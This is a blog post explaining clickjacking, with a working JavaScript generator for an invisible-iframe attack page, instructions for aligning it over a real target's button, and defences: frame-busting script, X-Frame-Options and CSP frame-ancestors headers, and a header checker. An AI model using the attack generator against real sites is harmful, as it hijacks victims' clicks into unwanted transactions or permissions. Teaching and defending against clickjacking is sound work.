Visually Hacked - Clickjacking
- Yahwanth Sabbithi
- Nov 7, 2020
- 3 min read
INTRODUCTION:
What is "CLICKJACKING"? It is an attack in which the attacker fools us with visual tricks: a button, or a whole working web page, is layered invisibly over the page we believe we are looking at, so a click meant for one thing actually lands on another. I refer to it as "never even believe your eyes", because the attacker can manipulate what you think you are doing. Now let's see it in depth.

What is Visually Hacked?
"Visuals" here means what you see on the screen: the layout, the images and the content of the page. We visit a lot of websites daily, like:
Facebook
Twitter
Instagram
News pages
Google
YouTube
Did you ever think about the clicks you make on these websites?
You go through a lot of buttons and links which redirect you to a new page or open another tab and give you some result. Are you sure that what the page does in the background is the same as what is visible on your screen?
No. When you click a button or a link, there is a chance that the thing you are clicking has a malicious element on top of it which is not visible to you. Think of an invisible man: we cannot see him, but he still does what he does, whether you notice him or not. In the same way, an invisible element still receives your click and performs its function, whether you see it or not.
Live Example:
Now let's see how clickjacking is done, with some visuals (images). The image you see has a "Like" button and the text "Hello November". We think it is just a like button: clicking it increases the like count of that particular page or post, which is what you expect when you like the content.
But what about the Subscribe button? Where did it come from? This is the tricky part. As I said above, an invisible element does the work assigned to it whether you notice it or not. Here a Subscribe button from another page is placed exactly on top of the Like button. The only difference between the two is that the Like button is visible and the Subscribe button is not, so the click you make on "Like" is received by "Subscribe".
To explain it in short: the opacity of the overlaid element is reduced to zero so that it becomes invisible but still sits on top and still receives clicks. That is what the attacker takes advantage of to make unwanted things happen without your attention. You can see it in the video for better clarity.
Examples of the areas where clickjacking is used
To be specific:
Getting access to someone's webcam by making them click a hidden "allow" control.
Making a bank transaction on the victim's behalf.
Deleting the passwords saved in Chrome.
Deactivating social accounts the victim is still logged in to.
In short, almost any action that takes a single click on a page the victim is logged in to can be hijacked this way.
Note: the website you want to embed must itself be vulnerable to clickjacking, that is, it must allow itself to be loaded inside a frame on another site. Otherwise you cannot place it on top of your own page.
How is this possible? Can you prove it?
I know this question will be raised in your mind. The only information I can give you legally here is that the two HTML pages are stacked with the help of the <iframe> tag, which embeds one HTML page inside another. The attacker's page holds the visible decoy, and the target page is loaded in an iframe on top of it with its opacity set to zero.
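As an added example (not code from the original post), here is how such a stacked page is put together in practice: a small JavaScript generator for the attacker's HTML. A visible decoy button sits underneath, the framable target is loaded in an iframe with opacity 0 on top of it, and the frame is offset so that the target's real button lands exactly over the decoy; the click therefore goes to the invisible frame. The target URL, button coordinates and frame size are placeholders assumed for illustration; on a real target you would measure them yourself (set opacity to 0.5 while aligning, then back to 0).

```javascript
// Added example, not code from the original post: generate a clickjacking
// proof-of-concept page. The decoy button is visible (z-index 1); the target
// page is framed on top of it (z-index 2) with opacity 0, and the frame is
// shifted so the target's button sits exactly over the decoy.
// All URLs and coordinates below are assumptions for illustration.

function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, c => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  }[c]));
}

function buildClickjackPoc(opts) {
  const {
    targetUrl,             // framable page whose button the victim should press
    decoyLabel = 'Like',   // what the victim believes they are clicking
    decoyLeft = 100,       // where the decoy button is drawn (px)
    decoyTop = 100,
    buttonLeft,            // position of the real button inside the target page (px)
    buttonTop,
    frameWidth = 1200,     // size of the hidden frame, large enough to show the button
    frameHeight = 900,
    opacity = 0,           // 0.5 while aligning, 0 for the real attack
  } = opts;
  if (!/^https?:\/\//i.test(targetUrl)) throw new Error('targetUrl must be http(s)');
  if (!Number.isFinite(buttonLeft) || !Number.isFinite(buttonTop)) {
    throw new Error('buttonLeft/buttonTop must be given');
  }
  // Shift the frame so that (buttonLeft, buttonTop) inside the target lines up
  // with the decoy's position on the attacker page.
  const frameLeft = decoyLeft - buttonLeft;
  const frameTop = decoyTop - buttonTop;
  return `<!doctype html>
<html><head><meta charset="utf-8"><title>Hello November</title>
<style>
  body { margin: 0; position: relative; }
  #decoy { position: absolute; left: ${decoyLeft}px; top: ${decoyTop}px; z-index: 1; }
  #target { position: absolute; left: ${frameLeft}px; top: ${frameTop}px;
            width: ${frameWidth}px; height: ${frameHeight}px; border: 0;
            opacity: ${opacity}; z-index: 2; } /* on top, but invisible */
</style></head>
<body>
  <button id="decoy">${escapeHtml(decoyLabel)}</button>
  <iframe id="target" src="${escapeHtml(targetUrl)}"></iframe>
</body></html>`;
}

// Constructed sample: the "Subscribe" button of an assumed target page sits at
// (640, 420); the decoy "Like" button is drawn at (100, 100).
const poc = buildClickjackPoc({
  targetUrl: 'https://target.example/profile',
  decoyLabel: 'Like',
  buttonLeft: 640,
  buttonTop: 420,
});
console.log(poc);
```

Open the generated file in a browser with opacity set to 0.5 to verify the alignment; if the target refuses to load inside the frame, it is not vulnerable (see the countermeasures below).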
Solution for clickjacking:
Countermeasures:
To implement this preventive measure, add the following code in the HEAD element of your page. Note how an ID is added to the STYLE element; the script below looks the element up by that ID. The style hides the whole page body by default:
<style id="antiClickjack">
  body { display: none !important; }
</style>
Now, delete that STYLE element from the script once you know the page is not inside a frame; if it is framed, navigate the top window to this page instead:
<script type="text/javascript">
  if (self === top) {
    /* Not framed: reveal the page by removing the hiding style. */
    var antiClickjack = document.getElementById("antiClickjack");
    antiClickjack.parentNode.removeChild(antiClickjack);
  } else {
    /* Framed: break out of the frame by loading this page in the top window. */
    top.location = self.location;
  }
</script>
The point of hiding the body first is that if the break-out fails (older frame-busting scripts could be defeated, and a frame loaded with the sandbox attribute cannot navigate the top window), the page stays hidden rather than clickable. Even so, this script is defence in depth; the response headers below are the primary protection.
Alternative solution:
Send the X-Frame-Options response header from the server, so that the browser itself refuses to render the page inside a frame on another site. In PHP, add
<?php header('X-Frame-Options: DENY'); ?>
to the top of your page, before any output. DENY blocks all framing; SAMEORIGIN allows frames only from your own origin. The modern equivalent, which takes precedence when both are present, is the frame-ancestors directive of Content-Security-Policy, for example header("Content-Security-Policy: frame-ancestors 'none'"). Be careful with the value: browsers ignore an X-Frame-Options value they do not recognise (for example GOFORIT), and PHP's header() replaces any earlier X-Frame-Options header, so sending such a value does not protect the page. It switches the SAMEORIGIN protection off.
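To check whether a response actually protects a page, here is an added example (not from the original post) in JavaScript that applies the browser rules to a set of response headers and decides whether a given attacker origin may frame the page: a Content-Security-Policy frame-ancestors directive, when present, overrides X-Frame-Options; X-Frame-Options DENY and SAMEORIGIN are honoured; any missing or unrecognised value leaves the page framable. The hostnames are constructed for the example, and port numbers in source expressions and multiple conflicting X-Frame-Options values are not modelled.

```javascript
// Added example, not code from the original post: decide from response
// headers whether a page can be framed by another origin, following the
// X-Frame-Options and CSP frame-ancestors rules browsers apply.
// Simplifications: ports in frame-ancestors sources and multiple conflicting
// X-Frame-Options values are not modelled.

function originOf(url) {
  const u = new URL(url);
  return `${u.protocol}//${u.host}`;
}

// Return the source list of the frame-ancestors directive, or null if absent.
function frameAncestors(csp) {
  if (!csp) return null;
  for (const directive of csp.split(';')) {
    const tokens = directive.trim().split(/\s+/).filter(Boolean);
    if (tokens.length && tokens[0].toLowerCase() === 'frame-ancestors') {
      return tokens.slice(1);
    }
  }
  return null;
}

// Does one frame-ancestors source expression allow framerOrigin?
function sourceMatches(src, framerOrigin, pageOrigin) {
  const s = src.replace(/^'|'$/g, '').toLowerCase();
  if (s === 'none') return false;
  if (s === '*') return true;
  if (s === 'self') return framerOrigin === pageOrigin;
  const framer = new URL(framerOrigin);
  if (/^[a-z][a-z0-9+.-]*:$/.test(s)) return framer.protocol === s; // scheme source, e.g. https:
  // host source, optionally with scheme and wildcard subdomain, e.g. https://*.partner.example
  const m = s.match(/^(?:([a-z][a-z0-9+.-]*):\/\/)?(\*\.)?([^/:]+)/);
  if (!m) return false;
  const [, scheme, wildcard, host] = m;
  if (scheme && framer.protocol !== scheme + ':') return false;
  return wildcard ? framer.hostname.endsWith('.' + host) : framer.hostname === host;
}

// headers: object mapping response header name (any case) to value.
function isFramableBy(headers, pageUrl, framerUrl) {
  const h = {};
  for (const [k, v] of Object.entries(headers)) h[k.toLowerCase()] = v;
  const pageOrigin = originOf(pageUrl);
  const framerOrigin = originOf(framerUrl);

  const ancestors = frameAncestors(h['content-security-policy']);
  if (ancestors) {
    // frame-ancestors present: it is authoritative and X-Frame-Options is ignored.
    return ancestors.some(src => sourceMatches(src, framerOrigin, pageOrigin));
  }

  const xfo = (h['x-frame-options'] || '').trim().toUpperCase();
  if (xfo === 'DENY') return false;
  if (xfo === 'SAMEORIGIN') return framerOrigin === pageOrigin;
  // Missing, obsolete ALLOW-FROM, or an unrecognised value such as GOFORIT:
  // browsers ignore the header, so any site can frame the page.
  return true;
}

// The headers a hardened response should carry: both, for old and new browsers.
function recommendedHeaders() {
  return {
    'X-Frame-Options': 'DENY',
    'Content-Security-Policy': "frame-ancestors 'none'",
  };
}

// Constructed sample: the mistaken GOFORIT header versus the hardened set.
const PAGE = 'https://bank.example/transfer';
const ATTACKER = 'https://evil.example/hello-november.html';
console.log('GOFORIT framable by attacker:', isFramableBy({ 'X-Frame-Options': 'GOFORIT' }, PAGE, ATTACKER));
console.log('hardened framable by attacker:', isFramableBy(recommendedHeaders(), PAGE, ATTACKER));
```

Feed it the headers you observe in the browser's network tab or from curl -I; a result of true for an attacker origin means the page can be used in the kind of overlay described above.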